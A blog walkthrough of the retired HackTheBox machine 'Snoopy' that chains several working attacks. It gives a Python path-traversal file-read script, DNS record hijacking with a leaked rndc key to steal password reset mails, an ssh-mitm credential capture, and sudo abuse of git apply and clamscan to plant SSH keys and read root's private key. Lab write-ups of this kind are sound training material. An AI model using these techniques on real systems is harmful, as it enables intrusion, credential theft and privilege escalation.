Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
HackTheBox - Snoopy
|htbmachinesretired|

Initial Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# Nmap 7.93 scan initiated Sun May  7 05:59:52 2023 as: nmap -sC -sV -oN nmap/snoopy snoopy.htb
Nmap scan report for snoopy.htb (10.129.84.73)
Host is up (0.53s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 ee6bcec5b6e3fa1b97c03d5fe3f1a16e (ECDSA)
|_  256 545941e1719a1a879c1e995059bfe5ba (ED25519)
53/tcp open  domain  ISC BIND 9.18.12-0ubuntu0.22.04.1 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.18.12-0ubuntu0.22.04.1-Ubuntu
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: SnoopySec Bootstrap Template - Index
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May  7 06:00:13 2023 -- 1 IP address (1 host up) scanned in 20.48 seconds

Lets start with enumerating Web service

Web

Opening the web we see a devops service provider

On the Team Section we find some user credentials

Trying the Contact form we see an error Email Form not found

and we also see the reason for that being mail.snoopy.htb is getting migrated

DNS enumeration

Running DNS zone transfer we find multiple domains

We find multiple entry but nothing for mail.snoopy.htb

1
2
3
4
5
6
7
8
9
10
11
snoopy.htb.
snoopy.htb.
snoopy.htb.
mattermost.snoopy.htb.
mm.snoopy.htb.
ns1.snoopy.htb.
ns2.snoopy.htb.
postgres.snoopy.htb.
provisions.snoopy.htb.
www.snoopy.htb.
snoopy.htb.

From the list we also find mm.snoopy.htb entry to be on 127.0.0.1 so lets try accessing it which seem to be a mattermost server

Enumerating Mattermost we see the version to be 7.9.0

After more enumerating we don’t see anything important

Going back to the www.snoopy.htb and enumearting we find Arbitrary File Read using the download endpoint

As we had to unzip all the response lets write a script which unzip and read the response from the file read.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import requests
from colorama import Fore, Style
import zipfile


def lfi(path):
    try:
        url ="http://snoopy.htb/download"
        params = {"file":f"....//....//....//....//....//....//....//....//....//....//....//..../{path}"}
        r= requests.get(url,params=params)
        if(r.status_code == 200):
            with open('ejemplo.zip', 'wb') as f:
                f.write(r.content)

            with zipfile.ZipFile('ejemplo.zip', 'r') as zip_ref:
                zip_ref.extractall('.')

            with open(f'press_package{path}', 'r') as f:
                content = f.read()
                print(Fore.GREEN + f"{content}" + Style.RESET_ALL)
 
        else:
            print(Fore.RED + f"{path} not found." + Style.RESET_ALL)

    except zipfile.BadZipFile:
        print(Fore.RED + f"{path} not found." + Style.RESET_ALL)
    except Exception as e:
        print(Fore.RED + f"LFI Error : {e}" + Style.RESET_ALL)


def main():
    while True:
        path  = input(Fore.BLUE + "[+] file >> " + Style.RESET_ALL)
        lfi(path)

if __name__ == "main":
    main()

Lets start with reading /etc/passwd we find two user cbrown and sbrown with user to be present on the server.

Enumerating more we find the /etc/bind/named.conf

Also checking the zone config

we can update using the rndc-key

As we can update the DNS server entry (we can add mail.snoopy.htb) and run a mail server to capture any request, also we can use the same to reset the user password by getting the reset mail.

Lets update the DNS entry using nsupdate 

1
2
3
4
nsupdate -y hmac-sha256:rndc-key:BEqUtce80uhu3TOEGJJaMlSx9WT2pkdeCtzBeDykQQA=
server ns1.snoopy.htb
update add mail.snoopy.htb. 86400 IN A 10.10.14.24
send

Reference: https://serverless.industries/2020/09/27/dns-nsupdate-howto.en.html

After update when we do a zone transfer we see mail.snoopy to be present.

We can use multiple tools to run a SMTP server but i choose to run it using python as it will be simple and fast for me.

1
sudo python3 -m smtpd -n -c DebuggingServer 10.10.14.24:25

Trying to rest the user password we get a mail on our mail server

From the mail we extract the reset link and open and change the password for the user, using which we get access to the mattermost account

From the messages we find that there is a Server Provisoning channel and also find out that command /server_provison sending the mail as the sbrown user we get a message from cbrown that he will look into it.
After trying multiple things I don’t get anything else.

So I did the above steps to reset the creds of cbrown.

After getting access to mattermost as cbrown user i see i get access to the Server Provisoning Channel.

Using the same command on that channel and running a nc listener running we see, we get a hit with a ssh banner.

From here I thought of running a fake ssh server to capture the credentails of cbrown
after some research i learnt about ssh-mitm which fit my requirement.

Lets run the ssh-mitm server with 

1
ssh-mitm server --listen-port 2222 --enable-keyboard-interactive-auth --ssh-interface noshell --remote-host snoopy.htb

which will act as a ssh server in the middle and forward all request back to the snoopy server.

and trying to send a provison request we get the credentials for user cbrown as sn00pedcr3dential!!!

Lets use the same creds to get access to the server.

Lateral Movement (cbrown -> sbrown)

Using the ssh command we get ssh shell on the server.

1
sshpass -p 'sn00pedcr3dential!!!' ssh cbrown@snoopy.htb

with the intial enumeration on the box i see that we can run 

1
git apply

as user sbrown

Checking the git version it was 2.34.1 and checking the options we see --directory

So I created a patch file using git format-patch of a authorized_keys with my public key as the public key.

After adding that and getting the patch

we can run 

1
sudo -u sbrown /usr/bin/git apply <patch>.patch --unsafe-path --directory /home/sbrown/.ssh/ --ignore-whitespace

Privillage Escalation (sbrown -> root)

and get user.txt doing the same sudo -l we see we can run clamscan as sbrown as root without any password

Running

1
sudo clamscan --debug -f /root/.ssh/id_rsa

Exposes the root ssh keys on STDERR.

lets recreate it and try it.

And we can do that and get root shell on the box.

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/snoopy/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
linuxhacktheboxhardgitmitmfile readdns-updatepassword resetssh-mitmclamscan